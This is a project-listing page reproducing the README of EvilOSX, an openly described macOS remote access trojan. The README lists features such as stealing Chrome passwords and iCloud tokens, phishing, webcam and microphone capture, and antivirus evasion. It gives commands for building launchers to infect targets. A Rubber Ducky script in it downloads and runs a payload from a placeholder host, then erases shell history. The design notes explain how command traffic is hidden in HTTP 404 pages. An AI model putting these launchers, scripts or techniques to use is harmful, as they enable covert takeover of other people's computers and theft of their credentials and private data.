GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → Marten4n6 → Evilosx

Marten4n6 / Evilosx

Licence: gpl-3.0
An evil RAT (Remote Administration Tool) for macOS / OS X.

Programming Languages

python
139335 projects - #7 most used programming language
Dockerfile
14818 projects

Labels

macospentestingosxmacmacosxbackdoorratpost-exploitationreverse-shell

Projects that are alternatives of or similar to Evilosx

Thoron
Thoron Framework is a Linux post-exploitation framework that exploits Linux TCP vulnerability to provide a shell-like connection. Thoron Framework has the ability to create simple payloads to provide Linux TCP attack.
Stars: ✭ 87 (-95.24%)
Mutual labels:  pentesting, backdoor, rat, post-exploitation, reverse-shell
Pupy
Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python
Stars: ✭ 6,737 (+268.95%)
Mutual labels:  pentesting, backdoor, rat, post-exploitation, reverse-shell
YAPS
Yet Another PHP Shell - The most complete PHP reverse shell
Stars: ✭ 35 (-98.08%)
Mutual labels:  backdoor, reverse-shell, rat, pentesting
Rspet
RSPET (Reverse Shell and Post Exploitation Tool) is a Python based reverse shell equipped with functionalities that assist in a post exploitation scenario.
Stars: ✭ 251 (-86.25%)
Mutual labels:  pentesting, backdoor, post-exploitation, reverse-shell
Ghost
Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device.
Stars: ✭ 1,934 (+5.91%)
Mutual labels:  backdoor, rat, post-exploitation
Mac-OS-Setup-Applications
👾 All I need to setup a new Mac and the applications I use everyday as a Web Developper
Stars: ✭ 96 (-94.74%)
Mutual labels:  mac, osx, macosx
Torat
ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication
Stars: ✭ 415 (-77.27%)
Mutual labels:  rat, post-exploitation, reverse-shell
Osx Iso
 Create a bootable ISO of OS X / macOS, from the installation app file
Stars: ✭ 616 (-66.27%)
Mutual labels:  osx, mac, macosx
Fire
🔥A delightful HTTP/HTTPS networking framework for iOS/macOS/watchOS/tvOS platforms written in Swift.
Stars: ✭ 243 (-86.69%)
Mutual labels:  osx, mac, macosx
Covertutils
A framework for Backdoor development!
Stars: ✭ 424 (-76.78%)
Mutual labels:  pentesting, post-exploitation, reverse-shell
Powershell Rat
Python based backdoor that uses Gmail to exfiltrate data through attachment. This RAT will help during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends it to an attacker as an e-mail attachment.
Stars: ✭ 636 (-65.17%)
Mutual labels:  pentesting, backdoor, rat
Jsonify
♨️A delightful JSON parsing framework.
Stars: ✭ 42 (-97.7%)
Mutual labels:  mac, osx, macosx
brewfile
🍎 Brewfile to install softwares in macOS for engineers
Stars: ✭ 37 (-97.97%)
Mutual labels:  mac, osx, macosx
Ghost
Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device. Ghost Framework gives you the power and convenience of remote Android device administration.
Stars: ✭ 992 (-45.67%)
Mutual labels:  backdoor, rat, post-exploitation
Macos Patcher
Command line tool for running macOS on unsupported Macs
Stars: ✭ 114 (-93.76%)
Mutual labels:  osx, mac, macosx
Tools Osx
A small collection of command line tools for Mac OS X, incl.: clipcat, dict, eject, launch, ql, swuser, trash & with.
Stars: ✭ 576 (-68.46%)
Mutual labels:  osx, mac, macosx
Tinkerershell
A simple python reverse shell written just for fun.
Stars: ✭ 62 (-96.6%)
Mutual labels:  backdoor, rat, reverse-shell
Macos Downloader
Command line tool for downloading macOS installers and beta updates
Stars: ✭ 162 (-91.13%)
Mutual labels:  osx, mac, macosx
Powerkey
Remap your Macbook's power key to Forward Delete
Stars: ✭ 212 (-88.39%)
Mutual labels:  osx, mac, macosx
Nord Iterm2
An arctic, north-bluish clean and elegant iTerm2 color scheme.
Stars: ✭ 651 (-64.35%)
Mutual labels:  osx, mac, macosx
View All Similar Projects ➔


Logo
EvilOSX

An evil RAT (Remote Administration Tool) for macOS / OS X.

License Python Issues Build Status Contributing

Marco Generator by Cedric Owens

This project is no longer active

Features

  • Emulate a terminal instance
  • Simple extendable module system
  • No bot dependencies (pure python)
  • Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
  • Persistent
  • GUI and CLI support
  • Retrieve Chrome passwords
  • Retrieve iCloud tokens and contacts
  • Retrieve/monitor the clipboard
  • Retrieve browser history (Chrome and Safari)
  • Phish for iCloud passwords via iTunes
  • iTunes (iOS) backup enumeration
  • Record the microphone
  • Take a desktop screenshot or picture using the webcam
  • Attempt to get root via local privilege escalation

How To Use

# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Go into the repository
$ cd EvilOSX

# Install dependencies required by the server
$ sudo pip install -r requirements.txt

# Start the GUI
$ python start.py

# Lastly, run a built launcher on your target(s)

Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.

Advanced users

There's also a CLI for those who want to use this over SSH:

# Create a launcher to infect your target(s)
$ python start.py --builder

# Start the CLI
$ python start.py --cli --port 1337

# Lastly, run a built launcher on your target(s)

Screenshots

CLI GUI

Motivation

This project was created to be used with my Rubber Ducky, here's the simple script:

REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
  • It takes about 10 seconds to backdoor any unlocked Mac, which is...... nice
  • Terminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise.
  • To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here.
    Aluminum Keyboard (ISO) is probably the one you are looking for.

Versioning

EvilOSX will be maintained under the Semantic Versioning guidelines as much as possible.
Server and bot releases will be numbered with the follow format:

<major>.<minor>.<patch>

And constructed with the following guidelines:

  • Breaking backward compatibility (with older bots) bumps the major
  • New additions without breaking backward compatibility bumps the minor
  • Bug fixes and misc changes bump the patch

For more information on SemVer, please visit https://semver.org/.

Design Notes

  • Infecting a machine is split up into three parts:
    • A launcher is run on the target machine whose only goal is to run the stager
    • The stager asks the server for a loader which handles how a payload will be loaded
    • The loader is given a uniquely encrypted payload and then sent back to the stager
  • The server hides it's communications by sending messages hidden in HTTP 404 error pages (from BlackHat's "Hiding In Plain Sight")
    • Command requests are retrieved from the server via a GET request
    • Command responses are sent to the server via a POST request
  • Modules take advantage of python's dynamic nature, they are simply sent over the network compressed with zlib, along with any configuration options
  • Since the bot only communicates with the server and never the other way around, the server has no way of knowing when a bot goes offline

Issues

Feel free to submit any issues or feature requests here.

Contributing

For a simple guide on how to create modules click here.

Credits

  • The awesome Empire project
  • Shoutout to Patrick Wardle for his awesome talks, check out Objective-See
  • manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts
    (now deleted... let me know if you reappear)
  • The slowloris module is pretty much copied from PySlowLoris
  • urwid and this code which saved me a lot of time with the CLI
  • Logo created by motusora

License

GPLv3

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].